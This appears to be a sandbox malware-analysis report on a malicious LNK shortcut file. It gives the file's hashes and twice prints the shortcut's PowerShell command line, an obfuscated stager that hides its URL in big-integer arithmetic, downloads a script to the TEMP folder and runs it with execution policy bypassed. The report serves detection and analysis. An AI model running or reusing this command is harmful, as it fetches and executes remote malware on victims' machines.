Malicious
Malicious

9dc08fd26220d23e91c0d4e3ecab0250

LNK File
|
MD5: 9dc08fd26220d23e91c0d4e3ecab0250
|
Size: 1.88 KB
|
application/x-ms-shortcut

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
9dc08fd26220d23e91c0d4e3ecab0250
Sha1
14215393bf73e327c71f76f1315641b1f913ab78
Sha256
b2a8540d1bd0a51ed3300d04e48460922df21aa297c0d4e258fa07b0a314b060
Sha384
f080d2ba5a2876ee899ac562131cd41e850136797fbcea0c5776de20b97988dc6fd22155a86e8543e666e1ce96534ef5
Sha512
f893597b80660e9fae50f0c1c220f069f5e9e9a3b1af5149f70395e8a078e375cedaff70455dcb31316199b871fbf5e603f40499cbe7a39ddbc85b78d5ebdaf4
SSDeep
24:8OjdmGjMDvSwjKUaWU3AcPWkp+/CW6p3IGbmlZb7AddEf4wZEYr4I0WK6c/6CabY:8EmeKpUQCJIGCrb7r4wdUIA6q6Cax
TLSH
F931FF241FA20238EAF7CB35E8B9B212A5217D16EB229F5F01D4025888F5121F4A5F3F
File Structure
9dc08fd26220d23e91c0d4e3ecab0250
Malicious
LNK CommandLine
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -ep bypass -c "$b=[bigint]\"64877732061057924990749200823432317930792\";$r=[bigint]\"26970234791277260253780594535657926499780\";$x=$b - $r;while($x -ne 0){$m+=[char]([int]($x -band 255));$x=$x -shr 8};iwr $m -OutFile $env:TEMP\MZjPE8dA.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\MZjPE8dA.ps1"
9dc08fd26220d23e91c0d4e3ecab0250 (1.88 KB)
File Structure
9dc08fd26220d23e91c0d4e3ecab0250
Malicious
LNK CommandLine
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe -ep bypass -c "$b=[bigint]\"64877732061057924990749200823432317930792\";$r=[bigint]\"26970234791277260253780594535657926499780\";$x=$b - $r;while($x -ne 0){$m+=[char]([int]($x -band 255));$x=$x -shr 8};iwr $m -OutFile $env:TEMP\MZjPE8dA.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\MZjPE8dA.ps1"

Malicious

9dc08fd26220d23e91c0d4e3ecab0250
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙